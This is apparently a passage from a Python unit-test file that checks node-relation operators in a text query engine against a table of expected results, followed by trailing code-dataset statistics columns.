('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
':1>': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', False),
('sign', 'c', 'sign', 'c', True),
('sign', 'd', 'sign', 'c', True),
('sign', 'e', 'sign', 'c', True),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', False),
('part', 's3', 'part', 's3', True),
('part', 's4', 'part', 's3', True),
('part', 's5', 'part', 's3', True),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', False),
('sign', 'c', 'part', 's3', True),
('sign', 'd', 'part', 's3', True),
('sign', 'e', 'part', 's3', True),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', False),
('part', 's3', 'sign', 'c', True),
('part', 's4', 'sign', 'c', True),
('part', 's5', 'sign', 'c', True),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'd2', 'part', 'small2', False),
('part', 'small2', 'part', 'd2', True),
('part', 't3', 'part', 'small2', True),
('part', 'small2', 'part', 't3', False),
('part', 'tim', 'part', 'tom', False),
('part', 'tom', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', True),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', False),
('part', 'tomb', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', True),
('part', 'tome', 'part', 'time', False),
('part', 'time', 'part', 'tome1n', True),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', True),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
':2>': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', True),
('sign', 'c', 'sign', 'c', True),
('sign', 'd', 'sign', 'c', True),
('sign', 'e', 'sign', 'c', True),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', True),
('part', 's3', 'part', 's3', True),
('part', 's4', 'part', 's3', True),
('part', 's5', 'part', 's3', True),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', True),
('sign', 'c', 'part', 's3', True),
('sign', 'd', 'part', 's3', True),
('sign', 'e', 'part', 's3', True),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', True),
('part', 's4', 'sign', 'c', True),
('part', 's5', 'sign', 'c', True),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'd2', 'part', 'small2', False),
('part', 'small2', 'part', 'd2', True),
('part', 't3', 'part', 'small2', True),
('part', 'small2', 'part', 't3', False),
('part', 'tim', 'part', 'tom', False),
('part', 'tom', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', True),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', True),
('part', 'tim', 'part', 'tom2p', True),
('part', 'tom2p', 'part', 'tim', True),
('part', 'timb', 'part', 'tomb', False),
('part', 'tomb', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb2p', True),
('part', 'tomb2p', 'part', 'timb', True),
('part', 'time', 'part', 'tome', True),
('part', 'tome', 'part', 'time', False),
('part', 'time', 'part', 'tome1n', True),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', True),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', True),
('part', 'tome2n', 'part', 'time', True),
('part', 'time', 'part', 'tome2p', True),
('part', 'tome2p', 'part', 'time', False),
),
'.namesign.': (
('sign', 'a', 'sign', 'a', True),
('sign', 'b', 'sign', 'a', False),
('sign', 'j', 'sign', 'j', False),
),
'.namesign=namesign.': (
('sign', 'a', 'sign', 'a', True),
('sign', 'b', 'sign', 'a', False),
('sign', 'j', 'sign', 'j', False),
),
'.namesign=namepart.': (
('sign', 'a', 'part', 's1', True),
('sign', 'b', 'part', 's1', False),
('part', 's1', 'sign', 'a', False),
),
'.number.': (
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'b', 'part', 's1', False),
('sign', 'b', 'part', 's2', True),
),
'.namesign#namesign.': (
('sign', 'a', 'sign', 'a', False),
('sign', 'b', 'sign', 'a', True),
('sign', 'a', 'sign', 'a', False),
('sign', 'j', 'sign', 'j', True),
),
'.number#number.': (
('sign', 'a', 'part', 's1', False),
('sign', 'a', 'sign', 'a', False),
('sign', 'j', 'sign', 'j', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'b', 'part', 's1', True),
('sign', 'b', 'part', 's2', False),
),
'.number>number.': (
('sign', 'a', 'part', 's1', False),
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', False),
('sign', 'b', 'sign', 'a', True),
('sign', 'b', 'part', 's2', False),
('sign', 'b', 'part', 's1', True),
('sign', 'j', 'sign', 'j', False),
('sign', 'j', 'sign', 'a', False),
('sign', 'a', 'sign', 'j', False),
),
'.number<number.': (
('sign', 'a', 'part', 's1', False),
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('sign', 'b', 'sign', 'a', False),
('part', 's2', 'sign', 'b', False),
('part', 's1', 'sign', 'b', True),
('sign', 'j', 'sign', 'j', False),
('sign', 'j', 'sign', 'a', False),
('sign', 'a', 'sign', 'j', False),
),
'.namesign~(^[sp]{2}-)|(-[sp]{2}$)~namepart.': (
('sign', 'a', 'part', 's1', True),
('sign', 'b', 'part', 's2', True),
('sign', 'a', 'part', 's2', True),
('sign', 'b', 'part', 's1', True),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', False),
('sign', 'c', 'part', 's3', True),
),
'.namesign~(^[sp]{2}-)|(-[sp]{2}$)~namesign.': (
('sign', 'a', 'sign', 'a', True),
('sign', 'b', 'sign', 'b', True),
('sign', 'c', 'sign', 'c', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', False),
),
'.namepart~(^[sp]{2}-)|(-[sp]{2}$)~namepart.': (
('part', 's1', 'part', 's1', True),
('part', 's2', 'part', 's2', True),
('part', 's3', 'part', 's3', True),
('part', 's1', 'part', 's2', True),
('part', 's1', 'part', 's3', False),
),
'.namesign~([sp]-)|(-[sp])~namepart.': (
('sign', 'a', 'part', 's1', True),
('sign', 'b', 'part', 's2', False),
('sign', 'a', 'part', 's2', False),
('sign', 'b', 'part', 's1', False),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', False),
('sign', 'c', 'part', 's3', False),
),
'.namesign~([sp]-)|(-[sp])~namesign.': (
('sign', 'a', 'sign', 'a', True),
('sign', 'b', 'sign', 'b', True),
('sign', 'c', 'sign', 'c', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
),
'.namepart~([sp]-)|(-[sp])~namepart.': (
('part', 's1', 'part', 's1', True),
('part', 's2', 'part', 's2', True),
('part', 's3', 'part', 's3', True),
('part', 's1', 'part', 's2', False),
('part', 's1', 'part', 's3', False),
),
}
# BUILD THE TEST CLASS
def makeTests():
# The central tester: run a query and check the result
def basicRel(self, type1, name1, type2, name2, answer):
'''
Given the test parameters, build a query and run it.
Depending on the node types involved, build additional
queries with custom sets and run them.
All queries should have the same result, given the parameters.
That result is either the empty tuple or a singleton tuple.
The expected answer states that whether the result is the singleton tuple.
'''
rel = self.rel
template = f'''
{type1} name={name1}
{rel} {type2} name={name2}
'''
hasResult = query(template) != ()
self.assertions += 1
self.assertTrue(hasResult if answer else not hasResult, msg=template)
tp1s = ('Node', 'Sign') if type1 == 'sign' else ('Node',)
tp2s = ('Node', 'Sign') if type2 == 'sign' else ('Node',)
for tp1 in tp1s:
for tp2 in tp2s:
template = f'''
{tp1} name={name1}
{rel} {tp2} name={name2}
'''
hasResult = query(template, sets=sets) != ()
with self.subTest(msg=template):
self.assertions += 1
self.assertTrue(hasResult if answer else not hasResult)
def makeTest(relSym, params):
'''
Given a relation operator symbol and a sequence of parameters for the
basic tester, define a function that executes a corresponding seuqence
of tests
'''
def xx(obj):
obj.rel = relSym
for values in params:
obj.basicRel(*values)
return xx
# Compose a dictionary of test functions
tests = {}
for (relSym, params) in comparisons.items():
testName = f'test_{relationKey[relSym]}'
tests[testName] = makeTest(relSym, params)
# See the unittest docs.
# setUp and tearDown are used here for counting the assertions done.
def setUp(self):
self.assertions = 0
def tearDown(self):
global assertions
assertions += self.assertions
sys.stderr.write(
f'assertions checked: {self.assertions:>3}'
f' overall {assertions} ... '
)
# build a test class and add attributes to it,
# in particular the tests in the dictionary just constructed
testClass = type('relations', (unittest.TestCase,), {
'longMessage': False,
'basicRel': basicRel,
'setUp': setUp,
'tearDown': tearDown,
**tests,
})
return testClass
if __name__ == '__main__':
# define the test class and call it relations
relations = makeTests()
assertions = 0
# perform tests
unittest.main()
sys.exit()
# if you need to debug, do it here,
# and comment out the line unittest.main() above
print(query('''
part name=upper
:0= part name=even
'''))
| 40.78238
| 78
| 0.408409
| 5,818
| 54,159
| 3.800275
| 0.046236
| 0.172185
| 0.040706
| 0.029172
| 0.860787
| 0.84844
| 0.828584
| 0.81194
| 0.80796
| 0.794663
| 0
| 0.02487
| 0.279104
| 54,159
| 1,327
| 79
| 40.813112
| 0.541429
| 0.019978
| 0
| 0.823529
| 0
| 0
| 0.299964
| 0.00932
| 0
| 0
| 0
| 0
| 0.007949
| 1
| 0.005564
| false
| 0
| 0.002385
| 0.000795
| 0.010334
| 0.000795
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b0c7a71294aef32ac40abaaad9dd371ffc16a72
| 6,407
|
py
|
Python
|
loldib/getratings/models/NA/na_nasus/na_nasus_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_nasus/na_nasus_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_nasus/na_nasus_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Nasus_Jng_Aatrox(Ratings):
pass
class NA_Nasus_Jng_Ahri(Ratings):
pass
class NA_Nasus_Jng_Akali(Ratings):
pass
class NA_Nasus_Jng_Alistar(Ratings):
pass
class NA_Nasus_Jng_Amumu(Ratings):
pass
class NA_Nasus_Jng_Anivia(Ratings):
pass
class NA_Nasus_Jng_Annie(Ratings):
pass
class NA_Nasus_Jng_Ashe(Ratings):
pass
class NA_Nasus_Jng_AurelionSol(Ratings):
pass
class NA_Nasus_Jng_Azir(Ratings):
pass
class NA_Nasus_Jng_Bard(Ratings):
pass
class NA_Nasus_Jng_Blitzcrank(Ratings):
pass
class NA_Nasus_Jng_Brand(Ratings):
pass
class NA_Nasus_Jng_Braum(Ratings):
pass
class NA_Nasus_Jng_Caitlyn(Ratings):
pass
class NA_Nasus_Jng_Camille(Ratings):
pass
class NA_Nasus_Jng_Cassiopeia(Ratings):
pass
class NA_Nasus_Jng_Chogath(Ratings):
pass
class NA_Nasus_Jng_Corki(Ratings):
pass
class NA_Nasus_Jng_Darius(Ratings):
pass
class NA_Nasus_Jng_Diana(Ratings):
pass
class NA_Nasus_Jng_Draven(Ratings):
pass
class NA_Nasus_Jng_DrMundo(Ratings):
pass
class NA_Nasus_Jng_Ekko(Ratings):
pass
class NA_Nasus_Jng_Elise(Ratings):
pass
class NA_Nasus_Jng_Evelynn(Ratings):
pass
class NA_Nasus_Jng_Ezreal(Ratings):
pass
class NA_Nasus_Jng_Fiddlesticks(Ratings):
pass
class NA_Nasus_Jng_Fiora(Ratings):
pass
class NA_Nasus_Jng_Fizz(Ratings):
pass
class NA_Nasus_Jng_Galio(Ratings):
pass
class NA_Nasus_Jng_Gangplank(Ratings):
pass
class NA_Nasus_Jng_Garen(Ratings):
pass
class NA_Nasus_Jng_Gnar(Ratings):
pass
class NA_Nasus_Jng_Gragas(Ratings):
pass
class NA_Nasus_Jng_Graves(Ratings):
pass
class NA_Nasus_Jng_Hecarim(Ratings):
pass
class NA_Nasus_Jng_Heimerdinger(Ratings):
pass
class NA_Nasus_Jng_Illaoi(Ratings):
pass
class NA_Nasus_Jng_Irelia(Ratings):
pass
class NA_Nasus_Jng_Ivern(Ratings):
pass
class NA_Nasus_Jng_Janna(Ratings):
pass
class NA_Nasus_Jng_JarvanIV(Ratings):
pass
class NA_Nasus_Jng_Jax(Ratings):
pass
class NA_Nasus_Jng_Jayce(Ratings):
pass
class NA_Nasus_Jng_Jhin(Ratings):
pass
class NA_Nasus_Jng_Jinx(Ratings):
pass
class NA_Nasus_Jng_Kalista(Ratings):
pass
class NA_Nasus_Jng_Karma(Ratings):
pass
class NA_Nasus_Jng_Karthus(Ratings):
pass
class NA_Nasus_Jng_Kassadin(Ratings):
pass
class NA_Nasus_Jng_Katarina(Ratings):
pass
class NA_Nasus_Jng_Kayle(Ratings):
pass
class NA_Nasus_Jng_Kayn(Ratings):
pass
class NA_Nasus_Jng_Kennen(Ratings):
pass
class NA_Nasus_Jng_Khazix(Ratings):
pass
class NA_Nasus_Jng_Kindred(Ratings):
pass
class NA_Nasus_Jng_Kled(Ratings):
pass
class NA_Nasus_Jng_KogMaw(Ratings):
pass
class NA_Nasus_Jng_Leblanc(Ratings):
pass
class NA_Nasus_Jng_LeeSin(Ratings):
pass
class NA_Nasus_Jng_Leona(Ratings):
pass
class NA_Nasus_Jng_Lissandra(Ratings):
pass
class NA_Nasus_Jng_Lucian(Ratings):
pass
class NA_Nasus_Jng_Lulu(Ratings):
pass
class NA_Nasus_Jng_Lux(Ratings):
pass
class NA_Nasus_Jng_Malphite(Ratings):
pass
class NA_Nasus_Jng_Malzahar(Ratings):
pass
class NA_Nasus_Jng_Maokai(Ratings):
pass
class NA_Nasus_Jng_MasterYi(Ratings):
pass
class NA_Nasus_Jng_MissFortune(Ratings):
pass
class NA_Nasus_Jng_MonkeyKing(Ratings):
pass
class NA_Nasus_Jng_Mordekaiser(Ratings):
pass
class NA_Nasus_Jng_Morgana(Ratings):
pass
class NA_Nasus_Jng_Nami(Ratings):
pass
class NA_Nasus_Jng_Nasus(Ratings):
pass
class NA_Nasus_Jng_Nautilus(Ratings):
pass
class NA_Nasus_Jng_Nidalee(Ratings):
pass
class NA_Nasus_Jng_Nocturne(Ratings):
pass
class NA_Nasus_Jng_Nunu(Ratings):
pass
class NA_Nasus_Jng_Olaf(Ratings):
pass
class NA_Nasus_Jng_Orianna(Ratings):
pass
class NA_Nasus_Jng_Ornn(Ratings):
pass
class NA_Nasus_Jng_Pantheon(Ratings):
pass
class NA_Nasus_Jng_Poppy(Ratings):
pass
class NA_Nasus_Jng_Quinn(Ratings):
pass
class NA_Nasus_Jng_Rakan(Ratings):
pass
class NA_Nasus_Jng_Rammus(Ratings):
pass
class NA_Nasus_Jng_RekSai(Ratings):
pass
class NA_Nasus_Jng_Renekton(Ratings):
pass
class NA_Nasus_Jng_Rengar(Ratings):
pass
class NA_Nasus_Jng_Riven(Ratings):
pass
class NA_Nasus_Jng_Rumble(Ratings):
pass
class NA_Nasus_Jng_Ryze(Ratings):
pass
class NA_Nasus_Jng_Sejuani(Ratings):
pass
class NA_Nasus_Jng_Shaco(Ratings):
pass
class NA_Nasus_Jng_Shen(Ratings):
pass
class NA_Nasus_Jng_Shyvana(Ratings):
pass
class NA_Nasus_Jng_Singed(Ratings):
pass
class NA_Nasus_Jng_Sion(Ratings):
pass
class NA_Nasus_Jng_Sivir(Ratings):
pass
class NA_Nasus_Jng_Skarner(Ratings):
pass
class NA_Nasus_Jng_Sona(Ratings):
pass
class NA_Nasus_Jng_Soraka(Ratings):
pass
class NA_Nasus_Jng_Swain(Ratings):
pass
class NA_Nasus_Jng_Syndra(Ratings):
pass
class NA_Nasus_Jng_TahmKench(Ratings):
pass
class NA_Nasus_Jng_Taliyah(Ratings):
pass
class NA_Nasus_Jng_Talon(Ratings):
pass
class NA_Nasus_Jng_Taric(Ratings):
pass
class NA_Nasus_Jng_Teemo(Ratings):
pass
class NA_Nasus_Jng_Thresh(Ratings):
pass
class NA_Nasus_Jng_Tristana(Ratings):
pass
class NA_Nasus_Jng_Trundle(Ratings):
pass
class NA_Nasus_Jng_Tryndamere(Ratings):
pass
class NA_Nasus_Jng_TwistedFate(Ratings):
pass
class NA_Nasus_Jng_Twitch(Ratings):
pass
class NA_Nasus_Jng_Udyr(Ratings):
pass
class NA_Nasus_Jng_Urgot(Ratings):
pass
class NA_Nasus_Jng_Varus(Ratings):
pass
class NA_Nasus_Jng_Vayne(Ratings):
pass
class NA_Nasus_Jng_Veigar(Ratings):
pass
class NA_Nasus_Jng_Velkoz(Ratings):
pass
class NA_Nasus_Jng_Vi(Ratings):
pass
class NA_Nasus_Jng_Viktor(Ratings):
pass
class NA_Nasus_Jng_Vladimir(Ratings):
pass
class NA_Nasus_Jng_Volibear(Ratings):
pass
class NA_Nasus_Jng_Warwick(Ratings):
pass
class NA_Nasus_Jng_Xayah(Ratings):
pass
class NA_Nasus_Jng_Xerath(Ratings):
pass
class NA_Nasus_Jng_XinZhao(Ratings):
pass
class NA_Nasus_Jng_Yasuo(Ratings):
pass
class NA_Nasus_Jng_Yorick(Ratings):
pass
class NA_Nasus_Jng_Zac(Ratings):
pass
class NA_Nasus_Jng_Zed(Ratings):
pass
class NA_Nasus_Jng_Ziggs(Ratings):
pass
class NA_Nasus_Jng_Zilean(Ratings):
pass
class NA_Nasus_Jng_Zyra(Ratings):
pass
| 15.364508
| 46
| 0.761667
| 972
| 6,407
| 4.59465
| 0.151235
| 0.216301
| 0.370802
| 0.463502
| 0.797582
| 0.797582
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173404
| 6,407
| 416
| 47
| 15.401442
| 0.843278
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
3b153425778774d12a62ab944bd2d03a17bf5404
| 4,537
|
py
|
Python
|
users/tests/test_views.py
|
schiederme/peering-manager
|
2d29427fd4f2b91a5208f31e1a7ad69eaf82924c
|
[
"Apache-2.0"
] | 173
|
2020-08-08T15:38:08.000Z
|
2022-03-21T11:35:25.000Z
|
users/tests/test_views.py
|
schiederme/peering-manager
|
2d29427fd4f2b91a5208f31e1a7ad69eaf82924c
|
[
"Apache-2.0"
] | 247
|
2017-12-26T12:55:34.000Z
|
2020-08-08T11:57:35.000Z
|
users/tests/test_views.py
|
schiederme/peering-manager
|
2d29427fd4f2b91a5208f31e1a7ad69eaf82924c
|
[
"Apache-2.0"
] | 63
|
2017-10-13T06:46:05.000Z
|
2020-08-08T00:41:57.000Z
|
from django.urls import reverse
from users.models import Token
from utils.tests import ViewTestCase
class UserTestCase(ViewTestCase):
def setUp(self):
super().setUp()
self.token = Token.objects.create(user=self.user)
def test_login_view(self):
response = self.client.get(reverse("login"))
self.assertEqual(response.status_code, 200)
# Login
response = self.client.post(reverse("login"), self.credentials, follow=True)
# Should be logged in
self.assertTrue(response.context["user"].is_active)
self.assertEqual(response.status_code, 200)
def test_logout_view(self):
response = self.client.get(reverse("logout"))
# Without been logged -> redirection
self.assertEqual(response.status_code, 302)
# Login
response = self.client.post(reverse("login"), self.credentials, follow=True)
# Should be logged in, so logout should work too
self.assertTrue(response.context["user"].is_active)
response = self.client.get(reverse("logout"))
self.assertEqual(response.status_code, 302)
def test_user_profile_view(self):
response = self.client.get(reverse("users:profile"))
# Without been logged -> redirection
self.assertEqual(response.status_code, 302)
# Login
response = self.client.post(reverse("login"), self.credentials, follow=True)
# Should be logged in, so page should work
self.assertTrue(response.context["user"].is_active)
response = self.client.get(reverse("users:profile"))
self.assertEqual(response.status_code, 200)
def test_user_change_password_view(self):
response = self.client.get(reverse("users:change_password"))
# Without been logged -> redirection
self.assertEqual(response.status_code, 302)
# Login
response = self.client.post(reverse("login"), self.credentials, follow=True)
# Should be logged in, so page should work
self.assertTrue(response.context["user"].is_active)
response = self.client.get(reverse("users:change_password"))
self.assertEqual(response.status_code, 200)
def test_user_token_list_view(self):
response = self.client.get(reverse("users:token_list"))
# Without been logged -> redirection
self.assertEqual(response.status_code, 302)
# Login
response = self.client.post(reverse("login"), self.credentials, follow=True)
# Should be logged in, so page should work
self.assertTrue(response.context["user"].is_active)
response = self.client.get(reverse("users:token_list"))
self.assertEqual(response.status_code, 200)
def test_user_token_add_view(self):
response = self.client.get(reverse("users:token_add"))
# Without been logged -> redirection
self.assertEqual(response.status_code, 302)
# Login
response = self.client.post(reverse("login"), self.credentials, follow=True)
# Should be logged in, so page should work
self.assertTrue(response.context["user"].is_active)
response = self.client.get(reverse("users:token_add"))
self.assertEqual(response.status_code, 200)
def test_user_token_edit_view(self):
response = self.client.get(
reverse("users:token_edit", kwargs={"pk": self.token.pk})
)
# Without been logged -> redirection
self.assertEqual(response.status_code, 302)
# Login
response = self.client.post(reverse("login"), self.credentials, follow=True)
# Should be logged in, so page should work
self.assertTrue(response.context["user"].is_active)
response = self.client.get(
reverse("users:token_edit", kwargs={"pk": self.token.pk})
)
self.assertEqual(response.status_code, 200)
def test_user_token_edit_view(self):
response = self.client.get(
reverse("users:token_delete", kwargs={"pk": self.token.pk})
)
# Without been logged -> redirection
self.assertEqual(response.status_code, 302)
# Login
response = self.client.post(reverse("login"), self.credentials, follow=True)
# Should be logged in, so page should work
self.assertTrue(response.context["user"].is_active)
response = self.client.get(
reverse("users:token_delete", kwargs={"pk": self.token.pk})
)
self.assertEqual(response.status_code, 200)
| 40.150442
| 84
| 0.659687
| 543
| 4,537
| 5.399632
| 0.110497
| 0.094134
| 0.141201
| 0.158254
| 0.912688
| 0.912688
| 0.884038
| 0.840723
| 0.783765
| 0.736357
| 0
| 0.013629
| 0.223716
| 4,537
| 112
| 85
| 40.508929
| 0.818853
| 0.133348
| 0
| 0.742857
| 0
| 0
| 0.075486
| 0.010747
| 0
| 0
| 0
| 0
| 0.342857
| 1
| 0.128571
| false
| 0.042857
| 0.042857
| 0
| 0.185714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b964d9eb650471a48dda912d6ab71c61f3cdf3b
| 45
|
py
|
Python
|
test2a.py
|
alibumaye81/topsy_new
|
c31d951b61bd0b33108ce891a7cdacfefafd72e1
|
[
"Apache-2.0"
] | null | null | null |
test2a.py
|
alibumaye81/topsy_new
|
c31d951b61bd0b33108ce891a7cdacfefafd72e1
|
[
"Apache-2.0"
] | null | null | null |
test2a.py
|
alibumaye81/topsy_new
|
c31d951b61bd0b33108ce891a7cdacfefafd72e1
|
[
"Apache-2.0"
] | null | null | null |
print('Hello')
print('Hello')
print('Topsy')
| 11.25
| 14
| 0.666667
| 6
| 45
| 5
| 0.5
| 0.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 45
| 3
| 15
| 15
| 0.714286
| 0
| 0
| 0.666667
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
d90bcfc570ab26490024925691e3f48692b4bc4c
| 343
|
py
|
Python
|
main/calc.py
|
pennowtech/CITests
|
d756a5f4ef53fdea2aaf02052fd1ff9d793a05f0
|
[
"MIT"
] | null | null | null |
main/calc.py
|
pennowtech/CITests
|
d756a5f4ef53fdea2aaf02052fd1ff9d793a05f0
|
[
"MIT"
] | 1
|
2019-11-26T23:23:58.000Z
|
2019-11-26T23:26:51.000Z
|
main/calc.py
|
linkedtechs/CITests
|
d756a5f4ef53fdea2aaf02052fd1ff9d793a05f0
|
[
"MIT"
] | null | null | null |
"""
Calculator library containing basic math operations.
"""
class Calculator:
def add(self, first_term, second_term):
return first_term + second_term
def subtract(self, first_term, second_term):
return first_term - second_term
def divide(self, first_term, second_term):
return first_term / second_term
| 22.866667
| 52
| 0.708455
| 44
| 343
| 5.25
| 0.363636
| 0.233766
| 0.38961
| 0.493506
| 0.649351
| 0.649351
| 0.649351
| 0.649351
| 0.649351
| 0.649351
| 0
| 0
| 0.215743
| 343
| 14
| 53
| 24.5
| 0.858736
| 0.151604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0
| 0.428571
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d926d754c5cf7a35f05fba9862f32fecc7f04ccc
| 128
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_0.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_0.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_0.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
name0_0_1_1_0_0_0 = None
name0_0_1_1_0_0_1 = None
name0_0_1_1_0_0_2 = None
name0_0_1_1_0_0_3 = None
name0_0_1_1_0_0_4 = None
| 14.222222
| 24
| 0.820313
| 40
| 128
| 1.875
| 0.175
| 0.16
| 0.466667
| 0.533333
| 0.88
| 0.88
| 0.746667
| 0
| 0
| 0
| 0
| 0.318182
| 0.140625
| 128
| 9
| 25
| 14.222222
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d96a3b0ffc12be282f8517c56713e621eeff5a55
| 127
|
py
|
Python
|
ENTRY_MODULE/ConditionalStatementsAdvanced/LAB/04_Personal_Titles.py
|
sleepychild/ProgramingBasicsPython
|
